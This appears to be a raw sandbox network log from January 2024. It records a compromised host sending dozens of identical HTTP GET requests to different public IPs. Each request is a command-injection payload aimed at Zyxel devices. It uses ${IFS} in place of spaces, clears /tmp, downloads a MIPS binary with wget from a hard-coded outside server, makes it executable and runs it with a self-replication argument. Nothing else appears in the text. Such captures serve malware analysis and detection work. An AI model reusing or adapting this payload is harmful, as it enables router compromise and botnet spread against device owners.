                                                Jan 28, 2024 10:16:44.100177050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9289192.168.2.23505444.221.239.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100210905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9290192.168.2.2359568222.67.160.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100225925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9291192.168.2.233325081.93.122.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100253105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9292192.168.2.234898892.230.98.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100286007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9293192.168.2.233710458.105.248.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100301981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9294192.168.2.2338002161.61.173.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100334883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9295192.168.2.2356296202.101.45.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100370884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9296192.168.2.2349532187.16.45.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100389957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9297192.168.2.235692663.142.3.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100419998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9298192.168.2.233350650.234.77.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100440979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9299192.168.2.235429669.158.75.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100450993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9300192.168.2.2354458164.206.87.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100516081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9301192.168.2.233924498.135.135.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100536108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9302192.168.2.2334826151.84.215.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100544930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9303192.168.2.235475281.183.174.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100564003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9304192.168.2.2360254199.101.177.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100580931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9305192.168.2.2341640184.239.172.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100619078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9306192.168.2.2339372134.155.243.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100649118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9307192.168.2.2334446205.20.15.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100682974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9308192.168.2.2339398190.43.115.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100714922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9309192.168.2.2348392159.34.0.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100735903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9310192.168.2.23522089.186.205.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100754976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9311192.168.2.2350364122.17.85.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100778103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9312192.168.2.233369095.113.134.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100795984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9313192.168.2.2341644140.126.21.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100815058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9314192.168.2.2354052123.240.170.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100867033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9315192.168.2.234646884.82.15.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100869894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9316192.168.2.2334896174.82.176.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100878954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9317192.168.2.2350606107.31.31.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100914001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9318192.168.2.2353864105.240.94.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100945950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9319192.168.2.2334424104.32.134.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.100989103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9320192.168.2.235415680.66.246.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101002932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9321192.168.2.2345726146.151.221.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101023912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9322192.168.2.2336414141.149.223.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101051092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9323192.168.2.2350418168.171.93.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101058960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9324192.168.2.2359204115.141.181.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101094007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9325192.168.2.234874646.224.136.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101149082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9326192.168.2.2352640194.234.139.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101171970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9327192.168.2.2344462103.143.227.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101211071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9328192.168.2.235133879.126.65.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101226091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9329192.168.2.2337182212.75.25.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101288080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9330192.168.2.235159895.55.211.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101300001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9331192.168.2.235707014.68.18.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101319075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9332192.168.2.2352146103.161.53.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101361990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9333192.168.2.2337558135.205.59.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101377964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9334192.168.2.2346408216.172.161.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101399899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9335192.168.2.235566489.4.61.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101402044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9336192.168.2.233432868.12.241.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101447105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9337192.168.2.2352608220.150.145.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101447105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9338192.168.2.2335240153.88.57.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101507902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9339192.168.2.2344650118.106.110.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101530075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9340192.168.2.23530505.166.9.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101552963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9341192.168.2.2347964216.182.217.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101571083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9342192.168.2.2346398168.6.1.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101593971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9343192.168.2.2347456102.155.18.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101615906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9344192.168.2.2352814183.171.3.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101650953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9345192.168.2.235123877.202.140.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101667881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9346192.168.2.234785438.28.148.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101674080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9347192.168.2.2360118172.204.216.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101728916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9348192.168.2.233512839.214.193.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101757050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9349192.168.2.234016227.196.176.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101779938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9350192.168.2.234330858.173.153.128443
                                                TimestampBytes transferredDirectionData
